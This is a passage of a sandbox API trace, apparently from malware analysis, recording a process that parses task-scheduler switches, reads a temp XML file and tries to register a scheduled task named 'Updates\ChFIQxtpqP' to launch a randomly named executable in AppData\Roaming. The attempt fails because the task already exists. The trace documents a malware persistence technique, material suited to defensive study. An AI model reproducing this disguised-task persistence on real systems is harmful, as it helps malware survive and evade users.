_Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.542] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|p|") returned 3 [0172.542] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.542] lstrlenW (lpString="|p|") returned 3 [0172.542] lstrlenW (lpString="|XML|") returned 5 [0172.542] SetLastError (dwErrCode=0x490) [0172.542] lstrlenW (lpString="ru") returned 2 [0172.542] lstrlenW (lpString="ru") returned 2 [0172.542] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.542] lstrlenW (lpString="XML") returned 3 [0172.542] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.542] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|ru|") returned 4 [0172.542] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.542] lstrlenW (lpString="|ru|") returned 4 [0172.542] lstrlenW (lpString="|XML|") returned 5 [0172.542] SetLastError (dwErrCode=0x490) [0172.542] lstrlenW (lpString="rp") returned 2 [0172.542] lstrlenW (lpString="rp") returned 2 [0172.542] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.542] lstrlenW (lpString="XML") returned 3 [0172.542] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.542] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|rp|") returned 4 [0172.542] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.542] lstrlenW (lpString="|rp|") returned 4 [0172.542] lstrlenW (lpString="|XML|") returned 5 [0172.543] SetLastError (dwErrCode=0x490) [0172.543] lstrlenW (lpString="sc") returned 2 [0172.543] lstrlenW (lpString="sc") returned 2 [0172.543] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.543] lstrlenW (lpString="XML") returned 3 [0172.543] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.543] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|sc|") returned 4 [0172.543] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.543] lstrlenW (lpString="|sc|") returned 4 [0172.543] lstrlenW (lpString="|XML|") returned 5 [0172.543] SetLastError (dwErrCode=0x490) [0172.543] lstrlenW (lpString="mo") returned 2 [0172.543] lstrlenW (lpString="mo") returned 2 [0172.543] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.543] lstrlenW (lpString="XML") returned 3 [0172.543] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.543] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|mo|") returned 4 [0172.543] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.543] lstrlenW (lpString="|mo|") returned 4 [0172.543] lstrlenW (lpString="|XML|") returned 5 [0172.543] SetLastError (dwErrCode=0x490) [0172.543] lstrlenW (lpString="d") returned 1 [0172.543] lstrlenW (lpString="d") returned 1 [0172.543] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.543] lstrlenW (lpString="XML") returned 3 [0172.543] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.544] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|d|") returned 3 [0172.544] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.544] lstrlenW (lpString="|d|") returned 3 [0172.544] lstrlenW (lpString="|XML|") returned 5 [0172.544] SetLastError (dwErrCode=0x490) [0172.544] lstrlenW (lpString="m") returned 1 [0172.544] lstrlenW (lpString="m") returned 1 [0172.544] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.544] lstrlenW (lpString="XML") returned 3 [0172.544] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.544] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|m|") returned 3 [0172.544] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.544] lstrlenW (lpString="|m|") returned 3 [0172.544] lstrlenW (lpString="|XML|") returned 5 [0172.544] SetLastError (dwErrCode=0x490) [0172.544] lstrlenW (lpString="i") returned 1 [0172.544] lstrlenW (lpString="i") returned 1 [0172.544] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.544] lstrlenW (lpString="XML") returned 3 [0172.544] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.544] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|i|") returned 3 [0172.544] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.544] lstrlenW (lpString="|i|") returned 3 [0172.544] lstrlenW (lpString="|XML|") returned 5 [0172.545] SetLastError (dwErrCode=0x490) [0172.545] lstrlenW (lpString="tn") returned 2 [0172.545] lstrlenW (lpString="tn") returned 2 [0172.545] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.545] lstrlenW (lpString="XML") returned 3 [0172.545] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.545] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|tn|") returned 4 [0172.545] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.545] lstrlenW (lpString="|tn|") returned 4 [0172.545] lstrlenW (lpString="|XML|") returned 5 [0172.545] SetLastError (dwErrCode=0x490) [0172.545] lstrlenW (lpString="tr") returned 2 [0172.545] lstrlenW (lpString="tr") returned 2 [0172.545] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.545] lstrlenW (lpString="XML") returned 3 [0172.545] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.545] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|tr|") returned 4 [0172.545] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.545] lstrlenW (lpString="|tr|") returned 4 [0172.545] lstrlenW (lpString="|XML|") returned 5 [0172.545] SetLastError (dwErrCode=0x490) [0172.545] lstrlenW (lpString="st") returned 2 [0172.545] lstrlenW (lpString="st") returned 2 [0172.545] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.546] lstrlenW (lpString="XML") returned 3 [0172.546] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.546] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|st|") returned 4 [0172.546] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.546] lstrlenW (lpString="|st|") returned 4 [0172.546] lstrlenW (lpString="|XML|") returned 5 [0172.546] SetLastError (dwErrCode=0x490) [0172.546] lstrlenW (lpString="sd") returned 2 [0172.546] lstrlenW (lpString="sd") returned 2 [0172.546] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.546] lstrlenW (lpString="XML") returned 3 [0172.546] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.546] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|sd|") returned 4 [0172.546] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.546] lstrlenW (lpString="|sd|") returned 4 [0172.546] lstrlenW (lpString="|XML|") returned 5 [0172.546] SetLastError (dwErrCode=0x490) [0172.546] lstrlenW (lpString="ed") returned 2 [0172.546] lstrlenW (lpString="ed") returned 2 [0172.546] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.546] lstrlenW (lpString="XML") returned 3 [0172.546] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.547] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|ed|") returned 4 [0172.547] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.547] lstrlenW (lpString="|ed|") returned 4 [0172.547] lstrlenW (lpString="|XML|") returned 5 [0172.547] SetLastError (dwErrCode=0x490) [0172.547] lstrlenW (lpString="it") returned 2 [0172.547] lstrlenW (lpString="it") returned 2 [0172.547] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.547] lstrlenW (lpString="XML") returned 3 [0172.547] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.547] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|it|") returned 4 [0172.547] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.547] lstrlenW (lpString="|it|") returned 4 [0172.547] lstrlenW (lpString="|XML|") returned 5 [0172.547] SetLastError (dwErrCode=0x490) [0172.547] lstrlenW (lpString="et") returned 2 [0172.547] lstrlenW (lpString="et") returned 2 [0172.547] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.547] lstrlenW (lpString="XML") returned 3 [0172.547] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.547] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|et|") returned 4 [0172.547] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.548] lstrlenW (lpString="|et|") returned 4 [0172.548] lstrlenW (lpString="|XML|") returned 5 [0172.548] SetLastError (dwErrCode=0x490) [0172.548] lstrlenW (lpString="k") returned 1 [0172.548] lstrlenW (lpString="k") returned 1 [0172.548] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.548] lstrlenW (lpString="XML") returned 3 [0172.548] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.548] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|k|") returned 3 [0172.548] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.548] lstrlenW (lpString="|k|") returned 3 [0172.548] lstrlenW (lpString="|XML|") returned 5 [0172.548] SetLastError (dwErrCode=0x490) [0172.548] lstrlenW (lpString="du") returned 2 [0172.548] lstrlenW (lpString="du") returned 2 [0172.548] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.548] lstrlenW (lpString="XML") returned 3 [0172.548] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.548] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|du|") returned 4 [0172.548] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.548] lstrlenW (lpString="|du|") returned 4 [0172.548] lstrlenW (lpString="|XML|") returned 5 [0172.548] SetLastError (dwErrCode=0x490) [0172.548] lstrlenW (lpString="ri") returned 2 [0172.549] lstrlenW (lpString="ri") returned 2 [0172.549] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.549] lstrlenW (lpString="XML") returned 3 [0172.549] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.549] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|ri|") returned 4 [0172.549] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.549] lstrlenW (lpString="|ri|") returned 4 [0172.549] lstrlenW (lpString="|XML|") returned 5 [0172.549] SetLastError (dwErrCode=0x490) [0172.549] lstrlenW (lpString="z") returned 1 [0172.549] lstrlenW (lpString="z") returned 1 [0172.549] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.549] lstrlenW (lpString="XML") returned 3 [0172.549] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.549] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|z|") returned 3 [0172.549] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.549] lstrlenW (lpString="|z|") returned 3 [0172.549] lstrlenW (lpString="|XML|") returned 5 [0172.549] SetLastError (dwErrCode=0x490) [0172.549] lstrlenW (lpString="f") returned 1 [0172.549] lstrlenW (lpString="f") returned 1 [0172.549] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.549] lstrlenW (lpString="XML") returned 3 [0172.550] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.550] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|f|") returned 3 [0172.550] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.550] lstrlenW (lpString="|f|") returned 3 [0172.550] lstrlenW (lpString="|XML|") returned 5 [0172.550] SetLastError (dwErrCode=0x490) [0172.550] lstrlenW (lpString="v1") returned 2 [0172.550] lstrlenW (lpString="v1") returned 2 [0172.550] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.550] lstrlenW (lpString="XML") returned 3 [0172.550] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.550] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|v1|") returned 4 [0172.550] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.550] lstrlenW (lpString="|v1|") returned 4 [0172.550] lstrlenW (lpString="|XML|") returned 5 [0172.550] SetLastError (dwErrCode=0x490) [0172.550] lstrlenW (lpString="xml") returned 3 [0172.550] lstrlenW (lpString="xml") returned 3 [0172.550] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.550] lstrlenW (lpString="XML") returned 3 [0172.550] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.551] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|xml|") returned 5 [0172.551] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.551] lstrlenW (lpString="|xml|") returned 5 [0172.551] lstrlenW (lpString="|XML|") returned 5 [0172.551] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|" [0172.551] SetLastError (dwErrCode=0x0) [0172.551] SetLastError (dwErrCode=0x0) [0172.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.551] lstrlenW (lpString="-/") returned 2 [0172.551] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0172.551] SetLastError (dwErrCode=0x490) [0172.551] SetLastError (dwErrCode=0x490) [0172.551] SetLastError (dwErrCode=0x0) [0172.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.551] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp" [0172.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.551] _memicmp (_Buf1=0x614d28, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.551] _memicmp (_Buf1=0x614d58, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.551] SetLastError (dwErrCode=0x7a) [0172.551] SetLastError (dwErrCode=0x0) [0172.551] SetLastError (dwErrCode=0x0) [0172.551] lstrlenW (lpString="C") returned 1 [0172.551] SetLastError (dwErrCode=0x490) [0172.551] SetLastError (dwErrCode=0x0) [0172.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.551] GetProcessHeap () returned 0x600000 [0172.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x7a) returned 0x616a20 [0172.552] SetLastError (dwErrCode=0x0) [0172.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.552] SetLastError (dwErrCode=0x0) [0172.552] GetProcessHeap () returned 0x600000 [0172.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x1fc) returned 0x616aa8 [0172.552] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0172.564] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0172.574] CoCreateInstance (in: rclsid=0xcc230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xcc20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x25ce64 | out: ppv=0x25ce64*=0x8a3e40) returned 0x0 [0172.585] TaskScheduler:ITaskService:Connect (This=0x8a3e40, serverName=0x25cdd4*(varType=0x8, wReserved1=0x0, wReserved2=0xce48, wReserved3=0x25, varVal1=0x0, varVal2=0x25d720), user=0x25cde4*(varType=0x0, wReserved1=0x25, wReserved2=0xce6c, wReserved3=0x25, varVal1=0x76779cde, varVal2=0x25d720), domain=0x25cdf4*(varType=0x0, wReserved1=0x0, wReserved2=0x1f0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), password=0x25ce04*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7677, varVal1=0x70, varVal2=0x25d8a0)) returned 0x0 [0172.590] TaskScheduler:IUnknown:AddRef (This=0x8a3e40) returned 0x2 [0172.590] TaskScheduler:ITaskService:GetFolder (in: This=0x8a3e40, Path=0x0, ppFolder=0x25cf08 | out: ppFolder=0x25cf08*=0x8a3ea8) returned 0x0 [0172.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmpf047.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x108 [0172.596] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x25c7f8 | out: lpFileSize=0x25c7f8*=1685) returned 1 [0172.596] ReadFile (in: hFile=0x108, lpBuffer=0x25c800, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x25c808, lpOverlapped=0x0 | out: lpBuffer=0x25c800*, lpNumberOfBytesRead=0x25c808*=0x2, lpOverlapped=0x0) returned 1 [0172.596] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.596] malloc (_Size=0x696) returned 0x8a2710 [0172.596] ReadFile (in: hFile=0x108, lpBuffer=0x8a2710, nNumberOfBytesToRead=0x696, lpNumberOfBytesRead=0x25c808, lpOverlapped=0x0 | out: lpBuffer=0x8a2710*, lpNumberOfBytesRead=0x25c808*=0x695, lpOverlapped=0x0) returned 1 [0172.597] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x8a2710, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1686 [0172.597] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x8a2710, cbMultiByte=-1, lpWideCharStr=0x6256dc, cchWideChar=1686 | out: lpWideCharStr="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 1686 [0172.597] SysStringLen (param_1="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 0x695 [0172.597] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", pbstrResult=0x25c7a8 | out: pbstrResult=0x25c7a8) returned 0x0 [0172.597] free (_Block=0x8a2710) [0172.597] CloseHandle (hObject=0x108) returned 1 [0172.598] lstrlenW (lpString="") returned 0 [0172.598] malloc (_Size=0xc) returned 0x8a13f0 [0172.598] SysStringLen (param_1="") returned 0x0 [0172.598] free (_Block=0x8a13f0) [0172.598] lstrlenW (lpString="") returned 0 [0172.598] ITaskFolder:RegisterTask (in: This=0x8a3ea8, Path="Updates\\ChFIQxtpqP", XmlText="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", flags=2, UserId=0x25c7e4*(varType=0x8, wReserved1=0x0, wReserved2=0x4230, wReserved3=0x62, varVal1="", varVal2=0x624230), password=0x25c7f4*(varType=0x0, wReserved1=0x62, wReserved2=0x0, wReserved3=0x0, varVal1=0x25c87c, varVal2=0x76ac7526), LogonType=0, sddl=0x25c808*(varType=0x0, wReserved1=0x62, wReserved2=0x4230, wReserved3=0x62, varVal1=0x0, varVal2=0x0), ppTask=0x25c868 | out: ppTask=0x25c868*=0x0) returned 0x800700b7 [0172.617] SetLastError (dwErrCode=0x800700b7) [0172.617] GetLastError () returned 0x800700b7 [0172.617] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x800700b7, dwLanguageId=0x0, lpBuffer=0x25c7fc, nSize=0x0, Arguments=0x0 | out: lpBuffer="丘b젌%鿹Í㺮瓌칸%锵Ì⥀皁\x01\x01臡გ\x01") returned 0x35 [0172.618] GetLastError () returned 0x800700b7 [0172.618] lstrlenW (lpString="Cannot create a file when that file already exists.\r\n") returned 53 [0172.618] GetProcessHeap () returned 0x600000 [0172.618] GetProcessHeap () returned 0x600000 [0172.618] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x613d20) returned 1 [0172.618] GetProcessHeap () returned 0x600000 [0172.618] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x613d20) returned 0x2 [0172.619] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x613d20 | out: hHeap=0x600000) returned 1 [0172.619] GetProcessHeap () returned 0x600000 [0172.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x6c) returned 0x6248d0 [0172.619] SetLastError (dwErrCode=0x800700b7) [0172.619] GetProcessHeap () returned 0x600000 [0172.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615758 [0172.619] _memicmp (_Buf1=0x614cc8, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.619] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x616718, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0172.619] lstrlenW (lpString="ERROR:") returned 6 [0172.619] 